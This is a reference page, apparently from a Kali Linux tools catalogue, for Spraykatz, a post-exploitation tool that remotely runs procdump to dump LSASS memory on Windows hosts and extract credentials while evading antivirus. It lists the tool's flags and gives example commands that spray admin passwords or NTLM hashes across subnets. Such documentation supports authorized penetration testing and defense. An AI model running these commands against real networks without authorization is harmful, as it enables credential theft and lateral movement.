Post Exploitationcredentialswindowsactive-directoryprocdumpremote-executioncredential-dumping

Spraykatz

Spraykatz retrieves credentials from Windows machines and large Active Directory environments by remotely executing procdump and parsing memory dumps to evade antivirus detection.

Description

Spraykatz is a tool designed to extract credentials from Windows systems, particularly in large Active Directory environments. It operates by remotely deploying procdump to target machines, capturing memory dumps, and parsing them for sensitive credential data. This approach minimizes detection by antivirus software since no local agent is required on the attacker's machine.

The tool requires the specified user to have administrative privileges on target systems to achieve remote code execution. It supports both individual IP addresses and ranges, making it suitable for spraying across multiple hosts in a network. Use cases include post-exploitation scenarios where initial access has been gained, and domain credentials are needed for lateral movement or privilege escalation.

Caution is advised as the tool explicitly warns against use in production environments. A cleanup mode is available to remove procdump binaries and leftover dumps from compromised systems.

How It Works

Spraykatz uses remote code execution on Windows targets via administrative credentials (username/password or NTLM hash). It deploys procdump remotely to capture LSASS process memory dumps containing credentials. These dumps are then retrieved and parsed using pypykatz for credential extraction, avoiding local antivirus triggers by performing all operations remotely.

Installation

bash

sudo apt install spraykatz

Flags

-u, --username USERNAMEUser to spray with. He must have admin rights on targeted systems in order to gain remote code execution.

-p, --password PASSWORDUser's password or NTLM hash in the LM:NT format.

-t, --targets TARGETSIP addresses and/or IP address ranges.

-d, --domain DOMAINUser's domain. If he is not member of a domain, simply use "-d ." instead.

-r, --removeOnly try to remove ProcDump and dumps left behind on distant machines. Just in case.

-v, --verbosity {warning,info,debug}Verbosity mode. Default is info.

-w, --wait WAITHow many seconds Spraykatz waits before exiting gracefully. Default is 180 seconds.

-h, --helpshow this help message and exit

Examples

Display the help menu and usage information for spraykatz.

spraykatz -h

Extract credentials from a single Windows target using admin credentials (domain inferred as local).

spraykatz.py -u administrator -p Password123 -t 192.168.1.100

Spray across an entire subnet in a domain environment to dump credentials from multiple hosts.

spraykatz.py -u administrator -p Password123 -t 192.168.1.0/24 -d COMPANY

Use NTLM hash authentication against a local machine (non-domain with ".").

spraykatz.py -u user -p aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -t 10.0.0.50 -d .

Target an IP range in a workgroup with debug verbosity for detailed output.

spraykatz.py -u admin -p Summer2024! -t 172.16.0.1-172.16.0.50 -d WORKGROUP -v debug

Remove procdump binaries and leftover dumps from a target machine (cleanup mode).

spraykatz.py -r -u admin -p Password123 -t 192.168.1.100

Extended wait time with info verbosity for unreliable network conditions across multiple targets.

spraykatz.py -u domain\svc_account -p hash:ntlmhash -t 10.10.10.10-10.10.10.20 -w 300 -v info

Updated 2026-04-16kali.org ↗